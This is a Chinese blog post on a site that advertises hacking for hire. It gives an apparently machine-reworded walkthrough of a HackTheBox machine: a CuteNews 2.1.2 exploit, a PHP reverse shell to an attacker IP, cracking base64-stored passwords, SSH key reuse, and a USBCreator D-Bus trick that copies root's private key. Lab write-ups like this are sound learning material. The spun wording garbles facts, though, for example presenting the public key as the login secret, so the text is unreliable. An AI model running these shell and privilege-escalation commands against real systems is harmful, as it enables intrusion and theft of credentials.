当前位置:首页 > 网络黑客 > 正文内容

hackthebox 我的第一次

访客4年前 (2021-04-09)网络黑客820

time手机微信(热烈欢迎搔扰沟通交流):

这是我第一次玩 hackthebox,就找一个尽可能通俗一点的,取得ip先简易扫一扫

那肯定仅有80逐渐点一下一看

那时候点了一个,就发现那样的连接(原本想跑文件目录,結果走不动就没试了)

要我试了好多个单引号,跑了下 sqlmap,随后发现并沒有,就难堪,接着再点这一红色的 RSS

顺手删掉一下 rss.php 见到登陆页面

再申请注册的情况下发现Powered by CuteNews 2.1.2 ? 2002–2020 CutePHP. ,这玩意肯定有系统漏洞

关键应该是后边2个,提交不明白明白咋更改文件夹名称,就想立即试着第二个, searchsploit CuteNews 2.1.2 -m 48800下载出来发现立即把url装进去就可以,这都能够?

发这一转化成的shell,不太好用就立即找到我小本本里的php反跳shell指令

php -r '$sock=fsockopen("10.10.14.8",4445);exec("/bin/bash -i<&3 >&3 2>&3");'

就四处找了好长时间,也试过 linux 核心系统漏洞,就注意到home文件目录下有两个登录名但沒有管理权限浏览

查看进程发现一下一个引人注意的物品

随后就没有了就挺下来想这web应当有一些提醒登陆密码啥的吧在web文件目录下寻找好长时间才发现这cdata文件目录下有物品

见到users.txt,平常见到他人文章内容在重要部位都发现users.txt,在看users文档发现全是base64的

一个破译看一下,发现有发生这两个客户,可是nadav的登陆密码没法在md5网址破译,就paul 破译出去 atlanta1

随后su发现没法取得成功

搜索一下,哦原先那样就可以了

python -c 'import pty; pty.spawn("/bin/sh")'

随后就要看了paul客户文件目录下的文档,cat .*/* 立即所有查询

见到有这一 ssh 的公钥

ssh 公与私密匙:能够转化成免密支付登陆,分成公钥和私钥,公钥才算是账户密码

ssh -i doc

PS:公钥文档务必只有是600,访问限制太高太低都不好,认为它是paul的公钥,想不到试了一下,nadav还可以登陆依据找他人文章内容提醒发现

发现USBCreator D-bus有一个插口系统漏洞,促使网络攻击可以浏览sudoer组里的客户,进而绕开sudo程序流程强加于的登陆密码安全设置。此系统漏洞容许网络攻击以根客户真实身份遮盖具备随意內容的随意文档,而不用出示登陆密码。这会造成 权利提高,比如,根据遮盖身影文档和为root密码设置。

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator--method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa(未受权浏览部位) /tmp/ssh(文档储放部位) true

运用 root 的公钥,取得成功登陆

小结:web层面进到,仔细观查,细心点,了解了ssh的公钥密匙难题,在取得地管理权限,关键搜集web网站的信息内容找提升。信息收集在渗入中至关重要。

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/106262.html

分享给朋友:

“hackthebox 我的第一次” 的相关文章

华流年京东618怎么个便宜法

京东618年中大促作为京东活动力度最大的一个购物节,自然是受到很多人关注的,有些小伙伴一早就想好要在京东618上面买什么东西了,还有些小伙伴连今年京东618怎么个便宜法都不知道,下面就由百思特小编来给大家说说吧! 2020京东618便宜多少...

淘宝什么时候发货(淘宝一般都是什么时候发货)

随着12月的到来,“双12推广”也如约而至。作为2020年电商最后一次推广,三天爆发也需要提前布局。 1双十二赛马规则 过去双十一促销,很多商家说没有达到预期,甚至很多免费流量也没有改变。问题的关键其实在于赛马规则。大推广前会有额外的赛马规则分配免费流量。想要在推广期获得更确定性的流量,必须了解...

奥运会遭到俄罗斯黑客攻击!黑客攻击微信聊天记录

人民网2021年8月13日02:28:03的消息,黑客攻击微信聊天记录 东京奥运会惨遭俄罗斯黑客攻击! 英国国家网络安全中心日前揭露了一项惊人的黑客计划:俄罗斯军事情报部门曾准备对原定今夏举办的东京奥林匹克运动会和残奥会发起网络攻击。据悉,其攻击目标涵盖赛事组织者、后勤公司和赞助商。 打开百...

我老公老是让他家的亲戚来我家,我该怎么办?请各位帮我想想办法,我

我老公老是让他家的亲戚来我家,我该怎么办?请各位帮我想想办法,我 请各位帮我想想办法,开网店怎么找女装货源唔爱神起助您成就财富人生,想做微商?想开实体店?想开淘宝店?什么才是你创业的最重要步骤?货源!想在微商卖童装母婴用品纸尿裤女装,开童装女装店铺,你去哪里找最好的货源?如何找童装女装一手货源呢?...

英寸和米的换算(这些单位换算你还知道吗?)

英寸和米的换算(这些单位换算你还知道吗?) 一寸等于多少厘米 更新:2016-03-28 14:07:21 查看相关文章 一寸等于多少厘米 1寸=3.3333333厘米(cm) 1英寸(in)=2.54厘米(cm) 一寸等于多少毫米 1寸=33.3333333毫米(mm) 1英寸...

安能物流 - 安得物流公司官网

苏占虎,3000多人的配套队伍。 很不错的一个网站:安能成立于2010年。 进入kuaidi1在物流查询里,安得物流股份有限公司,高性价比服务的物流供应商。未查到此运单1的信息,覆盖区域有限,公司加工实时的物流信息的基础上,装车2015,安全,扫描人。 安得物流有限公司成立于2000年1月,还是跟国...

评论列表

双笙颇倔
2年前 (2022-07-07)

现没法取得成功搜索一下,哦原先那样就可以了python -c 'import pty; pty.spawn("/bin/sh")'随后就要看了paul客户文件目录下的

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。